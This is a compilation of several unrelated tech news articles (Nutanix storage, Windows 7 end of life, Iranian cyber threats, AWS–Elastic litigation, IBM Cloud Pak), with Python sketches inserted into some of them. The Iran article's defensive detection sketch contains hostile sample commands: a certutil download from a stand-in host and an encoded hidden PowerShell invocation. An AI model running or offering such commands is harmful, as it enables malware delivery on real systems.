Nutanix Objects 2.0 lays groundwork for hybrid cloud

Nutanix pitched its latest Objects update as a play for scale-out object storage workloads, but experts said the hyper-converged infrastructure specialist is likely preparing for a push into the cloud.

Nutanix Objects 2.0 introduced features aimed at big data workloads. The new multicluster support consolidates Nutanix clusters under a single namespace, allowing for simpler, single-console management. Nutanix Objects 2.0 also added a 240 TB node, larger than any other Nutanix HCI node, allowing more capacity per cluster. The update also added WORM (write once, read many) support and Splunk certification.

Nutanix Objects, which launched in August 2019, provides software-defined object storage and is a stand-alone product from Nutanix HCI. Greg Smith, vice president of product marketing at Nutanix, said typical use cases include unstructured data archiving, big data and analytics. He also noticed an uptick in cloud-native application development in AWS S3 environments. Nutanix Objects uses an S3-compatible interface.

“We see increasing demand for object storage, particularly for big data,” Smith said.

Supporting cloud-native development is the real endgame of Nutanix Objects 2.0, said Eric Slack, senior analyst at Evaluator Group. The new features and capabilities aren't meant to capture customers with traditional object storage use cases, he said, because it's not cost-effective to put multiple petabytes on HCI. He said no one is waiting for an S3 interface before buying into HCI.

However, that S3 interface is important because, according to Slack, “S3 is what cloud storage talks.”

Slack believes the enhancements to Nutanix Objects will lay the groundwork for Nutanix Clusters, which is currently in beta. Nutanix Clusters allows Nutanix HCI to run in the cloud and communicate with Nutanix HCI running in the data center. This means organizations can develop applications on-site and run them in the cloud, or vice versa.

“I think that’s why they’re doing this — they’re getting ready for Nutanix Clusters,” Slack said. “This really plays into their cloud design, which is a good idea.”

Organizations want that level of flexibility right now because they do not know which workloads are more cost-efficient to run on premises or in the cloud. Having that same, consistent S3 interface is ideal for IT, Slack said, because it means their applications will run wherever it’s cheaper.
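The portability Slack describes comes from the S3 API being endpoint-agnostic: the same client code can target an on-premises Objects store or native AWS S3 by changing only its connection parameters. A minimal sketch of that idea (the endpoint URL and bucket name below are hypothetical examples, not real Nutanix or AWS values; with boto3 installed, the returned dict would be passed to `boto3.client(...)`):

```python
# Sketch: the same S3-speaking application targets on-premises or cloud
# object storage by swapping only its connection configuration. The
# endpoint URLs below are hypothetical, not real Nutanix or AWS values.

S3_TARGETS = {
    # On-premises Nutanix Objects deployment (hypothetical address)
    "on_prem": {"endpoint_url": "https://objects.corp.example:443"},
    # Native AWS S3: boto3 defaults to the regional AWS endpoint
    "aws": {"endpoint_url": None, "region_name": "us-east-1"},
}

def s3_client_params(target: str) -> dict:
    """Return connection parameters for the chosen deployment.

    Application code stays identical; only these parameters change,
    which is what makes S3-speaking apps portable across environments.
    """
    params = {"service_name": "s3"}
    params.update({k: v for k, v in S3_TARGETS[target].items() if v is not None})
    return params

# With boto3 this would become, e.g.:
#   client = boto3.client(**s3_client_params("on_prem"))
#   client.put_object(Bucket="analytics-archive", Key="log.gz", Body=data)

print(s3_client_params("on_prem"))
print(s3_client_params("aws"))
```

The point of the sketch is the one Slack makes: if the interface is identical everywhere, moving a workload between environments is a configuration change, not a rewrite.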

Some organizations were burned by cloud's initial hype, moving many of their workloads there only to find their costs went up. Slack said that has led to repatriation back to data centers as businesses do the cost analysis.

“Cloud wasn’t everything we thought it was,” Slack said.

Scott Sinclair, senior analyst at Enterprise Strategy Group (ESG), came to a similar conclusion about the importance of Nutanix Objects. HCI is about consolidating and simplifying servers, networking and storage, and Objects expands Nutanix HCI to cover object storage's traditional use cases: archive and active archive. However, there are growing use cases centered on developing in S3.

“We’re seeing the development of apps that write to an S3 API that may not be what we classify as traditional archive,” Sinclair said.

Nutanix's S3 interface streamlines interaction between on-premises environments and the cloud.

Citing ESG’s 2020 Technology Spending Intentions survey, Sinclair said 64% of IT decision-makers said their IT environments are more complex than they were years ago. Coupled with other data pointing to skills shortages in IT, Sinclair said organizations are currently looking for ways to simplify their data centers, resulting in interest in HCI.

That same survey also found 24% of respondents said they needed to go hybrid, with the perception that using the cloud is easier. Sinclair said this will logically lead to increased use of the S3 protocol, and that this is why Nutanix Objects is well-positioned. Right now, IT administrators know they need to use both on-premises and cloud resources, but they don't know to what extent they should use either. That's why businesses are taking the most flexible approach.

“Knowing that you don’t know is a smart position to take,” Sinclair said.


Data-driven storytelling makes data accessible

As organizations wrestle with an abundance of data and a dearth of experts in data interpretation, data-driven storytelling helps those organizations make sense of their information and drive their business forward.

Most business intelligence platforms help organizations transform their information into digestible data visualizations. Many, however, don't give the data context; they don't attempt to explain why sales dropped in a given month or rose in another, for example.

Some BI vendors — Tableau and Yellowfin, for example — have added data-driven storytelling capabilities.

Narrative Science, meanwhile, a Chicago-based vendor founded in 2010, is among a group of vendors whose sole focus is data storytelling, offering a suite of tools that give information context. Narrative Science recently introduced Lexio, a tool that turns data into digestible stories and is particularly suited for mobile devices.

Nate Nichols, vice president of product architecture at Narrative Science, and Anna Schena Walsh, director of growth marketing at the company, co-authored a book on storytelling titled Let Your People Be People. In the book, published Jan. 6, the authors look at 36 ways storytelling, with a particular emphasis on data-driven storytelling, can help change organizations, improving operations and helping employees not trained in data science use data to their advantage.

Nichols and Schena Walsh recently answered questions about data-driven storytelling. Here, in Part I of a two-part Q&A, they discuss the importance of data-driven storytelling. In Part II, they delve into how data-driven storytelling can improve an organization’s operations.

In a business sense, what is storytelling?

Anna Schena Walsh

Anna Schena Walsh: When we think of storytelling at Narrative Science, we spend a lot of time thinking about what makes a good story, because our software does data storytelling; we're going from data to story. What we realized is that the arc of a good story, when it comes to software, also applies to people. No matter where you sit in a business, you are a storyteller, whether you are a salesperson, a marketer or an engineer, and at some point in your career you need to be able to tell a good story, whether it's to advocate for yourself, to sell a product or something else. That's an essential skill for everyone to do precisely and to do well.

Homing in more narrowly on business intelligence and analytics, how do you define data-driven storytelling?

Nate Nichols

Nate Nichols: It’s what Anna said about storytelling and applying it to data. The real shift here is that there’s been this idea that getting to the right number, or doing some analysis and looking at a number or a chart, was sufficient, and that was where the process stopped. You got a number and then it’s an executive’s job to figure out what to go do with that, or someone else’s job to figure out what to go and do with those numbers. I think what our customers are looking at and what the world is waking up to is that the right answer is just the beginning of the problem. You have the right answer, but then the real work is the communication, and that’s the piece — the storytelling part — that can actually change the world and bring people along with you.


No movement was ever led by just stating an answer and then everyone realizing that was right and joining up of their own accord. It’s really telling the story, giving it the cause and effect, the context, the why. With all of the data and analysis that’s out there, you need to still actually do the work of mobilizing it.

How does data-driven storytelling manifest itself — how do you take the information and turn it into a story?

Nichols: One of the key components is using language, so when our system is writing stories it starts with a question from the user. They want to know how their sales pipeline is, how [operations] were last quarter. There are a lot of systems that can answer that — our system can answer that and tell you how many deals were made, but then it goes into a storytelling mode where it gives a reader the context, why this is happening or what else is happening around this — that context becomes really important. It’s cause and effect, and knowing why things are happening becomes super important.

It starts with an answer, and then brings in all those storytelling elements to express things in a way that makes sense to a person. A computer is good at saying, ‘Sales increased 22 percent week over week,’ but a human would say, ‘Sales are doing great,’ or, ‘Sales jumped a lot, sales shot up.’ It may be less numerically precise, but it’s a lot more intuitive and works with our brains better. Our system is adding on that layer, bringing in the context, bringing in the characters, and then doing a lot of work to put that in a single story that someone can sit down and read and has a beginning and an end.
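That "humanizing" layer can be pictured with a toy sketch: map a precise metric change to the kind of intuitive phrasing Nichols describes. This is an illustration only, not Narrative Science's system, and the thresholds are arbitrary assumptions.

```python
# Toy sketch of the layer Nichols describes: turn a numerically precise
# change into intuitive language. Thresholds are arbitrary assumptions;
# the real Narrative Science system is far more sophisticated.

def describe_change(metric: str, pct_change: float) -> str:
    """Render a week-over-week percentage change as a short phrase."""
    if pct_change >= 20:
        verb = "jumped"
    elif pct_change >= 5:
        verb = "rose"
    elif pct_change > -5:
        verb = "held steady"
    elif pct_change > -20:
        verb = "dipped"
    else:
        verb = "plunged"
    # Keep the precise number available, but lead with the intuition.
    return f"{metric} {verb} ({pct_change:+.0f}% week over week)"

print(describe_change("Sales", 22))
```

For the article's example of a 22% increase, the sketch leads with "Sales jumped" while retaining the exact figure in parentheses, which is the trade-off Nichols describes: slightly less numerically prominent, but more intuitive.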

Your book looks at different ways storytelling can be used by businesses — what are some of them?

Schena Walsh: The book looks at 36 different ways you can use storytelling. One is how to tell a better story, then how to create a storytelling environment, and then, at the end, how to use data storytelling to realize your talent. Here at Narrative Science we have software that surfaces the story and brings us the data we need, which frees employees from spending time digging through analytics and also gives them the data points they need to tell their own stories. So we actually spend a lot of time here training our people to tell their stories. Nate leads a storytelling workshop here at Narrative Science, and a lot of what we teach our employees and our clients is … in the book.

Why do businesses need to improve their data-driven storytelling abilities — what does it enable them to do that they might not otherwise be able to?

Schena Walsh: One big trend I've seen is companies leaning into what were previously referred to as soft skills. As more tasks are automated, these skills have become more and more important. For us, we truly believe that storytelling unlocks incredible potential for companies. We know we need to spend a lot of time with data, we need that information, and data storytelling allows us to tell stories about ourselves, our companies and our jobs really well and really precisely.

Editor’s note: This interview has been edited for clarity and conciseness.


With support for Windows 7 ending, a look back at the OS

With Microsoft’s support for Windows 7 ending this week, tech experts and IT professionals remembered the venerable operating system as a reliable and trustworthy solution for its time.

The OS was launched in 2009, and its official end of life came Tuesday, Jan. 14.

Industry observers spoke of Windows 7 ending, remembering the good and the bad of an OS that managed to hold its ground during the explosive rise of mobile devices and the growing popularity of web applications.

An old reliable

Stephen Kleynhans, research vice president at Gartner, said Windows 7 was a significant step forward from Windows XP, the system that had previously gained dominance in the enterprise.

Stephen Kleynhans

“Windows 7 kind of defined computing for most enterprises over the last decade,” he said. “You could argue it was the first version of Windows designed with some level of true security in mind.”

Windows 7 introduced several new security features, including enhanced Encrypting File System protection, increased control over administrator privileges and support for multiple firewall policies on a single system.

The OS, according to Kleynhans, also provided a comfortable familiarity for PC users.

“It was a really solid platform that businesses could build on,” he said. “It was a good, solid, reliable OS that wasn’t too flashy, but supported the hardware on the market.”

“It didn’t put much strain on its users,” he added. “It fit in with what they knew.”

Eric Klein, analyst at VDC Research Group Inc., said the launch of Windows 7 was a positive move from Microsoft following the “debacle” that was Windows Vista — the immediate predecessor of Windows 7, released in 2007.

“Vista was a very big black eye for Microsoft,” he said. “Windows 7 was more well-refined and very stable.”

Eric Klein

The fact that Windows 7 could be more easily administered than previous iterations of the OS, Klein said, was another factor in its enterprise adoption.

“So many businesses, small businesses included, really were all-in for Windows 7,” he said. “It was reliable and securable.”

Windows 7’s longevity, Klein said, was also due to slower hardware refresh rates, as companies often adopt new OSes when buying new computers. With web applications, there is less of a need for individual desktops to have high-end horsepower — meaning users can get by with older machines for longer.

Mark Bowker

“Ultimately, it was a well-tuned OS,” said Mark Bowker, senior analyst at Enterprise Strategy Group. “It worked, so it became the old reliable for a lot of organizations. Therefore, it remains on a lot of organizations’ computers, even at its end of life.”

Even Microsoft saw the value many enterprises placed in Windows 7 and responded by continuing support, provided customers pay for the service, according to Bowker. The company is allowing customers to pay for extended support for a maximum of three years past the Jan. 14 end of life.

Early struggles for Windows 7

Kleynhans said, although the OS is remembered fondly, the switch from Windows XP was far from a seamless one.

“What people tend to forget about the transition from XP to 7 was that it was actually pretty painful,” he said. “I think a lot of people gloss over the fact that the early days with Windows 7 were kind of rough.”

The biggest issue with that transition was with compatibility, Kleynhans said.

“At the time, a lot of applications that ran on XP and were developed on XP were not developed with a secure environment in mind,” he said. “When they were dropped into Windows 7, with its tighter security, a lot of them stopped working.”

Daniel Beato

Daniel Beato, director of technology at IT consulting firm TNTMAX, recalled some grumbling about a hard transition from Windows XP.

“At first, like with Windows 10, everyone was complaining,” he said. “As it matured, it became something [enterprises] relied on.”

A worthy successor?

Windows 7 is survived by Windows 10, an OS that experts said is in a better position to deal with modern computing.

“Windows 7 has fallen behind,” Kleynhans said. “It’s a great legacy system, but it’s not really what we want for the 2020s.”

Companies, said Bowker, may be hesitant to upgrade OSes, given the complications of the change. Still, he said, Windows 10 features make the switch more alluring for IT admins.

“Windows 10, especially with Office 365, starts to provide a lot of analytics back to IT. That data can be used to see how efficiently [an organization] is working,” he said. “[Windows 10] really opens eyes with the way you can secure a desktop… the way you can authenticate users. These things become attractive [and prompt a switch].”

Klein said news this week of a serious security vulnerability in Windows underscored the importance of regular support.

“[The vulnerability] speaks to the point that users cannot feel at ease, regardless of the fact that, in 2020, Windows is a very, very enterprise-worthy and robust operating system that is very secure,” he said. “Unfortunately, these things pop up over time.”

The news, Klein said, only underlines the fact that, while some companies may wish to remain on Windows 7, there is a large community of hackers who are aware of these vulnerabilities, and aware that Microsoft is ending support for the OS.

Beato said he still had customers working on Windows 7, but most people with whom he worked had made the switch to Windows 10. Microsoft, he said, had learned from Windows XP and provided a solid pathway to upgrade from Windows 7 to Windows 10.

The future of Windows

Klein noted that news about the next version of Windows would likely be coming soon. He wondered whether the trend toward keeping the smallest amount of data possible on local PCs would affect its design.

“Personally, I’ve found Microsoft to be the most interesting [of the OS vendors] to watch,” he said, calling attention to the company’s willingness to take risks and innovate, as compared to Google and Apple. “They’ve clearly turned the page from the [former Microsoft CEO Steve] Ballmer era.”


Experts weigh in on risk of Iranian cyberattacks against U.S.

The Department of Homeland Security warned of the potential for Iranian cyberattacks against the U.S., and security experts weighed in on the risks facing enterprises.

In the bulletin, released Saturday as part of the National Terrorism Advisory System, DHS said there was no indication that attacks from Iran were imminent, but noted the country and its allies “have demonstrated the intent and capability to conduct operations in the United States.” The bulletin was issued in the wake of escalating military conflict with Iran.

“Iran maintains a robust cyber program and can execute cyberattacks against the United States. Iran is capable, at a minimum, of carrying out attacks with temporary disruptive effects against critical infrastructure in the United States,” DHS wrote in the bulletin. “Be prepared for cyber disruptions, suspicious emails, and network delays. Implement basic cyber hygiene practices such as effecting data backups and employing multi-factor authentication [MFA].”

In general, experts agreed there is a legitimate threat of Iranian cyberattacks against U.S. entities, though many added that while Iran has offensive cyber capabilities, they are not known to be on the level of those of the U.S., China or Russia.

Rick Holland, CISO and vice president of strategy at Digital Shadows in San Francisco, said Iran has proven the ability to cause damage with cyberattacks.

“Iranian offensive cyber capabilities have grown significantly since the days of Stuxnet, which was a catalyst for the Iranian regime to mature their capabilities,” Holland told SearchSecurity. “While Iran isn’t as mature as the United States, Russia or China, they are capable of causing damage. Destructive or wiper malware like Iran used against Saudi Aramco could cause significant damage to their targets.”

Robert M. Lee, CEO and founder of Dragos, said Iran has “consistently been growing their capabilities and are aggressive and willing to be as destructive as they can be.”

“We’re unlikely to see widespread issues or scenarios such as disrupting electric power but it’s entirely possible we will see opportunistic responses to whatever damage they think they can inflict,” Lee told SearchSecurity. “Iran has shown previously to be opportunistic in its targeting of infrastructure with denial of service attacks against banks as well as trying to get access to industrial control systems in electric and water companies. While it is important to think where strategic targets would be for them, it’s just as relevant that they might search for those who are more insecure to be able to have an effect instead of a larger effect on a harder target.”

High disruption value

While DHS did not specify which organizations Iran might target with cyber operations, some experts tended to agree with Lee that infrastructure and financial targets would be the most likely.

Jake Williams, founder and president of Rendition Infosec in Augusta, Ga., classified Iran as having “moderately sophisticated capabilities.”

“They aren’t on par with Russia or China, but they aren’t script kiddies either. Iran will most likely target defense industrial base and financial institutions — basically, targets that have a high disruption value,” Williams told SearchSecurity. “For an enterprise, the things to keep in mind are DDoS and early indicators of compromise for defense industrial base organizations. Of course, Iran could target other verticals, but we assess these to be the most likely initial targets.”

Levi Gundert, vice president of intelligence and risk at Recorded Future, noted that “Iranian sponsored groups are constantly probing potential targets for weaknesses toward intelligence gathering.”

“When provoked, these groups have also successfully demonstrated retaliatory cyberattacks. Based on historical precedent, Iran retaliates with destructive attacks against perceived threatening organizations (e.g. Sands Corporation), or they attack businesses toward achieving economic impact — large American financial service companies (Operation Ababil) and Saudi Aramco are two good examples,” Gundert told SearchSecurity via email. “We believe the most likely targets of cyberattacks remain the United States government, contractors, and partner businesses involved in U.S. regional interests.”

However, Chris Morales, head of security analytics at threat detection vendor Vectra in San Jose, Calif., said “everyone could be at risk” of an Iranian cyberattack.

“While certain industries were targeted in the past for disruption or for data theft, there is no limitation to who could be targeted in an asymmetric attack that involves disruption, misdirection and confusion,” Morales told SearchSecurity. “Earlier state-sponsored Iranian actors stole only basic information, but over the past few years they have been building long-term espionage campaigns. The risk here being in many cases Iranian actors already persist inside networks and it becomes a case of identifying their presence and removing them.”

Holland said the risk of being targeted by Iran would be low for most organizations, but enterprises should perform threat modeling by asking:

  • How do Iranian interests intersect your business?
  • How has historic Iranian targeting/victimology related to your company?
  • How does the Iranian threat stack up against your supply chain?

Protecting your organization

Experts agreed that taking care of the basics is probably the best approach to defend against possible Iranian cyberattacks.

Dr. Chase Cunningham, principal analyst serving security and risk professionals for Forrester Research, suggested enterprises “fix the easy stuff: deploy MFA everywhere; bolster DDoS defense and make sure email security is in place. Other than that, brace for impact and maintain situational awareness.”

Holland said enterprises “shouldn’t have to take any extraordinary measures.”

“Patch operating systems and applications. Disable Microsoft Office macros. Implement application whitelisting. Restrict admin privileges. Disable external-facing Remote Desktop Protocol,” Holland said. “Enable multi-factor authentication for external-facing applications and privileged users. Monitor for malicious domains registrations related to your organization.”
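The last item on Holland's list, monitoring for malicious domain registrations, in practice means watching new-registration feeds for look-alike (typosquatted) variants of your own domains. A minimal stdlib sketch of generating such a watchlist; the homoglyph map is a small illustrative assumption, and real tools such as dnstwist cover many more permutation classes:

```python
# Minimal sketch: generate look-alike domain candidates to watch for in
# new-registration feeds. The homoglyph map is a small illustrative
# subset; real tools (e.g. dnstwist) cover many more permutation classes.

HOMOGLYPHS = {"o": "0", "l": "1", "i": "1", "e": "3", "a": "4"}

def lookalike_domains(domain: str) -> set:
    """Return common single-edit look-alike variants of a domain."""
    name, _, tld = domain.partition(".")
    candidates = set()
    # Single-character homoglyph substitutions: paypal -> paypa1
    for i, ch in enumerate(name):
        if ch in HOMOGLYPHS:
            candidates.add(name[:i] + HOMOGLYPHS[ch] + name[i + 1:] + "." + tld)
    # Adjacent-character transpositions: example -> examlpe
    for i in range(len(name) - 1):
        swapped = name[:i] + name[i + 1] + name[i] + name[i + 2:]
        if swapped != name:
            candidates.add(swapped + "." + tld)
    return candidates

print(sorted(lookalike_domains("example.com")))
```

Each generated candidate would then be checked against WHOIS or certificate-transparency feeds; a fresh registration of one of these variants is a common early indicator of a phishing campaign against the organization.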

Gundert suggested organizations “take the time to understand Iranian sponsored groups’ historical tools, tactics, and techniques.”

“These groups typically achieve initial unauthorized access through password re-use, phishing, and/or web shells,” Gundert said. “Now is a great time to review and improve security controls for each threat category, as well as visibility into post-compromise activity like the usage of native Windows tools.”
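The "native Windows tools" Gundert mentions refers to living-off-the-land techniques, where attackers abuse built-in binaries such as certutil or mshta rather than dropping custom malware. A toy sketch of that post-compromise visibility, flagging process command lines against a few well-known abuse patterns; the pattern list is a small illustrative subset, not a production detection ruleset:

```python
# Toy sketch of post-compromise visibility into native Windows tool
# abuse ("living off the land"). The patterns are a small illustrative
# subset of well-known techniques, not a production detection ruleset.
import re

SUSPICIOUS_PATTERNS = [
    (r"certutil(\.exe)?\b.*-urlcache", "certutil used as a downloader"),
    (r"mshta(\.exe)?\b.*https?://", "mshta executing a remote script"),
    (r"powershell(\.exe)?\b.*-enc", "PowerShell with encoded command"),
]

def flag_command_lines(cmdlines):
    """Return (command line, reason) pairs matching an abuse pattern."""
    hits = []
    for cmd in cmdlines:
        for pattern, reason in SUSPICIOUS_PATTERNS:
            if re.search(pattern, cmd, re.IGNORECASE):
                hits.append((cmd, reason))
                break
    return hits

sample = [
    "certutil.exe -urlcache -split -f http://bad.example/a.exe a.exe",
    "notepad.exe report.txt",
    "powershell.exe -nop -w hidden -enc SQBFAFgA...",
]
for cmd, reason in flag_command_lines(sample):
    print(f"{reason}: {cmd}")
```

In practice this kind of matching runs over endpoint telemetry or Windows event logs; the value, per Gundert's point, is visibility into activity that looks legitimate because the binaries themselves are legitimate.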

Lee said the best approach is for cybersecurity professionals to “be in a heightened sense of awareness and put the investments they’ve made into people, process, and technology to use.”

“For companies that have yet to make proper investments into the cybersecurity of their business, there is not much that can be done quickly in situations like this,” Lee said. “Companies need to prepare ahead of these moments, and any angst felt should serve as an opportunity to look internally to determine what your plans would be, especially for incident response and disaster recovery.”


AWS rejects Elasticsearch trademark lawsuit claims

AWS has responded to an Elasticsearch trademark lawsuit with broad denials of its claims, but experts said an eventual settlement is not only likely, but also the best outcome for customers.

Elasticsearch Inc., known as Elastic, sued AWS on Sept. 27 on grounds of false advertising and trademark infringement related to AWS’ Open Distro for Elasticsearch, AWS’ version of the popular distributed analytics and search engine. Elastic originated and serves as chief maintainer of the open source project.

AWS, with the participation of Expedia and Netflix, launched Open Distro for Elasticsearch in March. The companies said this move was necessary because Elastic’s version includes too much proprietary code inside the main open source code line. Open Distro for Elasticsearch is fully open source and licensed under Apache 2.0, according to AWS.

The Elasticsearch trademark lawsuit contends that branding for both the original Amazon Elasticsearch Service, which AWS has sold since 2015, and Open Distro for Elasticsearch violates Elastic’s trademark, and that customers are “likely to be confused as to whether Elastic sponsors or approves AESS [Amazon Elasticsearch Service] and Open Distro.”

AWS filed its response to Elastic’s complaint last week in U.S. District Court for the Northern District of California. The company denies all wrongdoing, demands a jury trial and offers a series of defensive arguments, one being that Elastic’s trademark infringement claims “are barred at least in part” under the fair use doctrine. Another asserts that Elastic gave AWS a license to use the term “Elasticsearch.”

Overall, AWS’ response to the Elasticsearch trademark lawsuit is fairly boilerplate, said Jeremy Peter Green, a New York-based attorney specializing in trademark law who reviewed it and Elastic’s original complaint.


“In the trademark world, different lawyers have different ways of doing this [but] usually law firms just have templates for these,” Green said.

For example, another AWS defense cites the doctrine of unclean hands, a legal concept that means a complainant shouldn’t be awarded relief if they have committed legal breaches of their own in a dispute.

This, too, is standard practice, according to Green. “There’s always a chance that during the discovery process, something will show up,” he said. “You’re just hedging your bets by accusing them of everything.”

Green has been evaluating options for managed Elasticsearch as part of a trademark search engine he plans to develop. AWS does seem to have sowed some consumer confusion, which is the basis of trademark infringement law, Green said.

“I like Elastic’s case here, from the perspective as both an attorney and consumer,” he said. Elastic’s initial complaint calls for treble damages and attorney’s fees, a figure that could be significant if it wins at trial.


It is likely that the parties will settle, Green added. “I think [Elastic has] a good enough case that it would be silly for [AWS] to throw a lot of money at it.”

Many Elasticsearch users also host their clusters on AWS anyway, which blurs the competitive lines. “Both of these companies have a major incentive to come to some kind of settlement,” Green said.

Experienced enterprise IT buyers are aware of the potential repercussions of intellectual property battles, according to Holger Mueller, an analyst at Constellation Research in Cupertino, Calif. “But ultimately, it is in the interest of the sparring vendors to settle and keep customers going,” he said.


IBM Cloud Pak for Security aims to unify hybrid environments

IBM this week launched Cloud Pak for Security, which experts say represents a major strategy shift for Big Blue’s security business.

The aim of IBM’s Cloud Pak for Security is to create a platform built on open-source technology that can connect security tools from multiple vendors and cloud platforms in order to help reduce vendor lock-in. IBM Cloud Paks are pre-integrated and containerized software running on Red Hat OpenShift, and previously IBM had five options for Cloud Paks — Applications, Data, Integration, Automation and Multicloud Management — which could be mixed and matched to meet enterprise needs.

Chris Meenan, director of offering management and strategy at IBM Security, told SearchSecurity that Cloud Pak for Security was designed to tackle two “big rock problems” for infosec teams. The first aim was to help customers get data insights through federated search of their existing data without having to move it to one place. Second was to help “orchestrate and take action across all of those systems” via built-in case management and automation. 

Meenan said IT staff will be able to take actions across a multi-cloud environment, including “quarantining users, blocking IP addresses, reimaging machines, restarting containers and forcing password resets.”

“Cloud Pak for Security is the first platform to take advantage of STIX-Shifter, an open-source technology pioneered by IBM that allows for unified search for threat data within and across various types of security tools, datasets and environments,” Meenan said. “Rather than running separate, manual searches for the same security data within each tool and environment you’re using, you can run a single query with Cloud Pak for Security to search across all security tools and data sources that are connected to the platform.” 
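The federated model Meenan describes can be pictured as a fan-out: one query, translated into each connected tool's native dialect, executed per tool, and merged. A toy model of that flow; the connector classes and query dialects below are invented for illustration, and the real STIX-Shifter API differs:

```python
# Toy model of federated search in the STIX-Shifter style: one query is
# translated into each connected tool's native dialect, executed there,
# and the results merged. The connector classes and query dialects are
# invented for illustration; the real STIX-Shifter API is different.

class Connector:
    """A security data source that can translate and run a query."""
    def __init__(self, name, translate, run):
        self.name, self.translate, self.run = name, translate, run

def federated_search(query, connectors):
    """Fan one logical query out to every connector and merge the hits."""
    results = []
    for c in connectors:
        native_query = c.translate(query)   # per-tool translation step
        for hit in c.run(native_query):     # per-tool execution step
            results.append({"source": c.name, "hit": hit})
    return results

# Two fake data sources with different native query dialects.
siem = Connector(
    "siem",
    translate=lambda q: f"search ip={q['ip']}",
    run=lambda nq: ["event-1"] if "10.0.0.5" in nq else [],
)
edr = Connector(
    "edr",
    translate=lambda q: {"filter": {"remote_ip": q["ip"]}},
    run=lambda nq: ["proc-7"] if nq["filter"]["remote_ip"] == "10.0.0.5" else [],
)

# One logical query, fanned out to both tools, results tagged by source.
print(federated_search({"ip": "10.0.0.5"}, [siem, edr]))
```

The key property mirrors Meenan's description: the data stays in each tool, and only the query travels, with the platform handling translation and result merging.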

Meenan added that Cloud Pak for Security represented a shift in IBM Security strategy because of its focus on delivering “security solutions and outcomes without needing to own the data.”

“That’s probably the biggest shift — being able to deliver that to any cloud or on-premise the customer needs,” Meenan said. “Being able to deliver that without owning the data means organizations can deploy any different technology and it’s not a headwind. Now they don’t need to duplicate the data. That’s just additional overhead and introduces friction.”

One platform to connect them all

Meenan said IBM was “very deliberate” to keep data transfers minimal, so at first Cloud Pak for Security will only take in alerts from connected vendor tools and search results.

“As our Cloud Pak develops, we plan to introduce some capability to create alerts and potentially store data as well, but as with other Cloud Paks, the features will be optional,” Meenan said. “What’s really fundamental is we’ve designed a Cloud Pak to deliver applications and outcomes but you don’t have to bring the data and you don’t have to generate the alerts. Organizations have a SIEM in place, they’ve got an EDR in place, they’ve got all the right alerts and insights, what they’re really struggling with is connecting all that in a way that’s easily consumable.”

In order to create the connections to popular tools and platforms, IBM worked with clients and service providers. Meenan said some connectors were built by IBM and some vendors built their own connectors. At launch, Cloud Pak for Security will include integration for security tools from IBM, Carbon Black, Tenable, Elastic, McAfee, BigFix and Splunk, with integration for Amazon Web Services and Microsoft Azure clouds coming later in Q4 2019, according to IBM’s press release.

Ray Komar, vice president of technical alliances at Tenable, said that from an integration standpoint, Cloud Pak for Security “eliminates the need to build a unique connector to various tools, which means we can build a connector once and reuse it everywhere.”

“Organizations everywhere are reaping the benefits of cloud-first strategies but often struggle to ensure their dynamic environments are secure,” Komar told SearchSecurity. “With our IBM Cloud Pak integration, joint customers can now leverage vulnerability data from Tenable.io for holistic visibility into their cloud security posture.”

Jon Oltsik, senior principal analyst and fellow at Enterprise Strategy Group, based in Milford, Mass., told SearchSecurity that he likes this new strategy for IBM and called it “the right move.”

“IBM has a few strong products but other vendors have much greater market share in many areas. Just about every large security vendor offers something similar, but IBM can pivot off QRadar and Resilient and extend its footprint in its base. IBM gets this and wants to establish Cloud Pak for Security as the ‘brains’ behind security. To do so, it has to be able to fit nicely in a heterogeneous security architecture,” Oltsik said. “IBM can also access on-premises data, which is a bit of unique implementation. I think IBM had to do this as the industry is going this way.”

Martin Kuppinger, founder and principal analyst at KuppingerCole Analysts AG, based in Wiesbaden, Germany, said Cloud Pak for Security should be valuable for customers, specifically “larger organizations and MSSPs that have a variety of different security tools from different vendors in place.”

“This allows for better incident response processes and better analytics. Complex attacks today might span many systems, and analysis requires access to various types of security information. This is simplified, without adding yet another big data lake,” Kuppinger told SearchSecurity. “Obviously, Security Cloud Pak might be perceived competitive by incident response management vendors, but it is open to them and provides opportunities by building on the federated data. Furthermore, a challenge with federation is that the data sources must be up and running for accessing the data — but that can be handled well, specifically when it is only about analysis; it is not about real-time transactions here.”

The current and future IBM Security products

Meenan told SearchSecurity that Cloud Pak for Security would not have any special integration with IBM Security products, which would “have to stand on their own merits” in order to be chosen by customers. However, Meenan said new products in the future will leverage the connections enabled by the Cloud Pak.

“Now what this platform allows us to do is to deliver new security solutions that are naturally cross-cutting, that require solutions that can sit across an EDR, a SIEM, multiple clouds, and enable those,” Meenan said. “When we think about solutions for insider threat, business risk, fraud, they’re very cross-cutting use cases so anything that we create that cuts across and provides that end-to-end security, absolutely the Cloud Pak is laying the foundation for us — and our partners and our customers — to deliver that.”

Oltsik said IBM’s Security Cloud Pak has a “somewhat unique hybrid cloud architecture” but noted that it is “a bit late to market and early versions won’t have full functionality.”

“I believe that IBM delayed its release to align it with what it’s doing with Red Hat,” Oltsik said. “All that said, IBM has not missed the market, but it does need to be more aggressive to compete with the likes of Cisco, Check Point, FireEye, Fortinet, McAfee, Palo Alto, Symantec, Trend Micro and others with similar offerings.”

Kuppinger said that from an overall IBM Security perspective, this platform “is rather consequent.”

“IBM, with its combination of software, software services, and implementation/consultancy services, is targeted on such a strategy of integration,” Kuppinger wrote via email. “Not owning data definitely is a smart move. Good architecture should segregate data, identity, and applications/apps/services. This allows for reuse in modern, service-oriented architectures. Locking-in data always limits that reusability.”

Go to Original Article

Experts on demand: Your direct line to Microsoft security insight, guidance, and expertise – Microsoft Security

Microsoft Threat Experts is the managed threat hunting service within Microsoft Defender Advanced Threat Protection (ATP) that includes two capabilities: targeted attack notifications and experts on demand.

Today, we are extremely excited to share that experts on demand is now generally available and gives customers direct access to real-life Microsoft threat analysts to help with their security investigations.

With experts on demand, Microsoft Defender ATP customers can engage directly with Microsoft security analysts to get guidance and insights needed to better understand, prevent, and respond to complex threats in their environments. This capability was shaped through partnership with multiple customers across various verticals by investigating and helping mitigate real-world attacks. From deep investigation of machines that customers had a security concern about, to threat intelligence questions related to anticipated adversaries, experts on demand extends and supports security operations teams.

The other Microsoft Threat Experts capability, targeted attack notifications, delivers alerts that are tailored to organizations and provides as much information as can be quickly delivered to bring attention to critical threats in their network, including the timeline, scope of breach, and the methods of intrusion. Together, the two capabilities make Microsoft Threat Experts a comprehensive managed threat hunting solution that provides an additional layer of expertise and optics for security operations teams.

Experts on the case

